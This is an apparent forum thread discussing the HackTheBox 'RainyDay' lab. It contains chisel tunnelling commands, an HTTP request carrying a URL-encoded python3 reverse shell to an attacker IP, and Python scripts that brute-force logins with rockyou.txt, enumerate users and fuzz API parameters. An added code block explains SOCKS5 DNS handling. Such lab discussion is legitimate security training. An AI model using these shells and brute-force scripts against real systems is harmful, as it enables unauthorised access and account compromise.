RainyDay - HTB [Discussion]
With chisel it's better to use proxychains with SOCKS5.

You will be able to run nmap and other tools.

You can put 127.0.0.1 and the SOCKS5 port in your browser proxy settings, and change the IP in your /etc/hosts to 172.18.0.1.

./chisel server -p 8001 --reverse

./chisel client IP:8001 R:1080:socks

Edit /etc/proxychains4.conf:

socks5 127.0.0.1 1080

Test: proxychains nmap 172.18.0.1

All good?

Add 127.0.0.1 1080 SOCKS5 in your browser and try to access dev.rainycloud.htb again.

If you are using the FoxyProxy addon, disable "Send DNS through SOCKS5 proxy".
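
An added example (my own code, not from the thread, chisel or proxychains) showing why the post says to turn off "Send DNS through SOCKS5 proxy": with a reverse chisel tunnel the SOCKS server runs on the pivot host, so a CONNECT that carries the hostname (ATYP 0x03) asks the pivot to resolve dev.rainycloud.htb, whereas resolving it locally from /etc/hosts sends the IPv4 address (ATYP 0x01). The HOSTS dict is a constructed stand-in for the /etc/hosts entry the post describes.

```python
import ipaddress
import socket
import struct

# Constructed stand-in for the /etc/hosts line from the post (assumption).
HOSTS = {"dev.rainycloud.htb": "172.18.0.1"}


def socks5_greeting() -> bytes:
    """Client hello: VER=5, one auth method offered, 0x00 = no authentication."""
    return b"\x05\x01\x00"


def socks5_connect(host: str, port: int, dns_through_proxy: bool) -> bytes:
    """Build a SOCKS5 CONNECT request (RFC 1928, section 4)."""
    header = b"\x05\x01\x00"  # VER=5, CMD=CONNECT(1), RSV=0
    if dns_through_proxy:
        # ATYP 0x03 (domain name): the proxy, i.e. the pivot host behind the
        # chisel reverse tunnel, has to resolve the name, and it has no entry for it.
        name = host.encode()
        addr = b"\x03" + bytes([len(name)]) + name
    else:
        # ATYP 0x01 (IPv4): resolve locally, hosts entry first, then system DNS,
        # and send only the packed address through the tunnel.
        ip = HOSTS.get(host) or socket.gethostbyname(host)
        addr = b"\x01" + ipaddress.IPv4Address(ip).packed
    return header + addr + struct.pack("!H", port)


def parse_connect(req: bytes):
    """Decode a CONNECT request the way a SOCKS server sees it: (atyp, target, port)."""
    if req[:3] != b"\x05\x01\x00":
        raise ValueError("not a SOCKS5 CONNECT request")
    atyp = req[3]
    if atyp == 0x01:
        target, rest = str(ipaddress.IPv4Address(req[4:8])), req[8:]
    elif atyp == 0x03:
        n = req[4]
        target, rest = req[5:5 + n].decode(), req[5 + n:]
    else:
        raise ValueError(f"unsupported ATYP {atyp:#x}")
    return atyp, target, struct.unpack("!H", rest[:2])[0]
```

With the browser's DNS-through-proxy option on, the pivot receives the bare hostname and the connection fails; with it off, the pivot receives 172.18.0.1 and routes it into the container network.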
(October 15, 2022, 10:19 PM)yumi Wrote: With chisel it's better to use proxychains with SOCKS5.

I'm dumb... thanks!

Request:

POST /containers HTTP/1.1
Host: rainycloud.htb
Content-Length: 305
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://rainycloud.htb
Referer: http://rainycloud.htb/containers
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sdWA.3B7E0YbxhG1Dp-Epq1P7o0_mgLk
Connection: close

action=execdetachsh+-c+python3+-c+%27import+os%2Cpty%2Csocket%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28%2210.10.17.168%22%2C4545%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cf%29for+f+in%280%2C1%2C2%29%5D%3Bpty.spawn%28%22%2Fbin%2Fsh%22%29%27&id=aad40c4a9464f675a33645d6111e28b6b73919a6f651865ce1752e6527046e82

Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 15 Oct 2022 22:33:46 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 7
Connection: close
Vary: Cookie

Success

but no revshell

Do y'all also get "missing parameter" when trying to talk to that /api/healthcheck through the POST method?
(October 15, 2022, 10:18 PM)dumpsterX0 Wrote:
(October 15, 2022, 10:12 PM)Hacker2222 Wrote:
(October 15, 2022, 10:11 PM)dumpsterX0 Wrote:
(October 15, 2022, 10:08 PM)Hacker2222 Wrote:
(October 15, 2022, 10:06 PM)dumpsterX0 Wrote: Still failing to get a reverse shell.
Can anyone post a request method?


Use the python3 rev shell and execute /bin/sh, not /bin/bash. Also use the "in background" button.


Yes, I did everything, but no connection.


What revshell did you execute?


python3 shortest

Are you remembering to use the VPN connection and not just the normal IP?

How do you guys upgrade a shell?

Here's Some Python3 Code To Brute Force The JSON Param

import requests
from colorama import Fore

def json():
    url = 'http://dev.rainycloud.htb/api/healthcheck'
    headers = {"Cookie": "session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc", "Content-Type": "application/json"}
    with open("/opt/wordlists/pams.txt", "r", encoding='latin-1') as file:
        pams = file.readlines()  # the with-block closes the file, no file.close() needed
    for pam in pams:
        pam = pam.strip()  # readlines() keeps the trailing newline, which would corrupt the key
        payload = {pam: "test"}
        print(Fore.RED + f"Trying Para: {pam}")
        r = requests.post(url, headers=headers, json=payload, verify=False)
        if "missing parameter" not in r.text:
            print(Fore.YELLOW + f"Parameter Found: {pam}")
            break


Make Sure To Indent it


I Had It Indented But The Form Undid It

(October 16, 2022, 01:21 AM)vuln63 Wrote: Here's Some Python3 Code To Brute Force The JSON Param

I was stuck too long on tunnelling, can you please explain it to me mate?

(October 16, 2022, 01:25 AM)Hacker2222 Wrote:
(October 16, 2022, 01:21 AM)vuln63 Wrote: Here's Some Python3 Code To Brute Force The JSON Param


What is the result?

I'm Still Brute Forcing


I Also Tried Some $eq $regex As Params But Nothing


I Just Finished No Results


I'm Gonna Try A New Wordlist


(October 16, 2022, 01:27 AM)dumpsterX0 Wrote:
(October 16, 2022, 01:21 AM)vuln63 Wrote: Here's Some Python3 Code To Brute Force The JSON Param

I was stuck too long on tunnelling, can you please explain it to me mate?


Sure. You Have To Get A Shell On A container you Create. I Went And used a python3 rev shell, upgraded to meterpreter, uploaded a static nmap binary, discovered hosts and used chisel to start a reverse tunnel to get access to dev.rainycloud.htb, and changed its IP to 127.0.0.1 in /etc/hosts.

And I used this to guide me with the chisel syntax: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html


Btw, After I Finish This Box I'm Writing A Script That Breaks Down How To Pwn The Box


This Is The Full Script I've Got So Far

#!/usr/bin/env python3

import requests
import colorama
from colorama import Fore

colorama.init(autoreset=True)  # reset the colour after every print

def brute():
    url = 'http://rainycloud.htb/login'
    headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://rainycloud.htb/login", "Host": "rainycloud.htb"}
    with open("/opt/wordlists/rockyou.txt", "r", encoding='latin-1') as file:
        passwords = file.readlines()
    for word in passwords:
        word = word.rstrip("\n")  # readlines() keeps the newline
        data = {"username": "jack", "password": word}  # dict so requests URL-encodes special characters
        print(Fore.RED + f"Trying Password: {word}")
        r = requests.post(url, headers=headers, data=data, verify=False)
        if "Error - Login Incorrect!" not in r.text and r.status_code != 400:
            print(Fore.YELLOW + f"Password Found: {word}")
            break

def userenum():
    url = 'http://rainycloud.htb/login'
    headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://rainycloud.htb/login", "Host": "rainycloud.htb"}
    with open("/opt/wordlists/users.txt", "r", encoding='latin-1') as file:
        users = file.readlines()
    for user in users:
        user = user.rstrip("\n")
        data = {"username": user, "password": "test"}
        print(Fore.RED + f"Trying Username: {user}")
        r = requests.post(url, headers=headers, data=data)
        # unknown users come back with a page containing this traceback line
        if "/var/www/rainycloud/./app.py:288" not in r.text:
            print(Fore.YELLOW + f"Username Found: {user}")
            c = input(Fore.YELLOW + "Would You Like To Keep Enumerating Y/N ")
            if c.strip().upper() == "N":
                break

def json():
    url = 'http://dev.rainycloud.htb/api/healthcheck'
    headers = {"Cookie": "session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc", "Content-Type": "application/json"}
    with open("/opt/wordlists/dirbuster.txt", "r", encoding='latin-1') as file:
        pams = file.readlines()  # the with-block closes the file, no file.close() needed
    for pam in pams:
        pam = pam.strip()  # drop the trailing newline so the JSON key is the bare word
        payload = {pam: "test"}
        print(Fore.RED + f"Trying Para: {pam}")
        r = requests.post(url, headers=headers, json=payload, verify=False)
        if "missing parameter" not in r.text:
            print(Fore.YELLOW + f"Parameter Found: {pam}")
            break

if __name__ == "__main__":
    json()

Also Don't Try To Forge JWT Tokens Cus When I Tried, /containers Got A Permanent 503 And I Had To Restart The Box